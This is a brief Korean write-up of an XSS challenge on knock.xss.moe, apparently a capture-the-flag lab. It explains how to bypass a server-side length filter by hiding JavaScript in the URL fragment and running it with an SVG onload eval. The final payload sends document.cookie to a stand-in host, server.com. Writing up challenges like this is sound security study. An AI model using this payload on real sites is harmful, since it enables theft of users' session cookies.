길이제한이 있어서 상당히 빡셌다.
원평이에게 힌트를 얻었는데 fragment url이란다.
구글링했는데 개 오지는 기법인것 같다.
글자길이 필터링은 어쩌피 서버측인데, # 뒤는 서버로 안 넘어가는 것을 이용한 익스다.
여러 삽질 끝에 얻은 페이로드는
?q=<svg/onload=eval(location.hash.substr(1,))>#window.location='//server.com?'%2bdocument.cookie
location.hash가 뒤에 #부분을 파싱해서 가져온다.
근데 #도 같이 가져와버려서 substr로 잘라버렸다.
최종 익스는
http://51b123fbd6a21b3cf43f49e0a1014221e191c7db.knock.xss.moe/?q=<svg/onload=eval(location.hash.substr(1,))>#window.location='//server.com'+document.cookie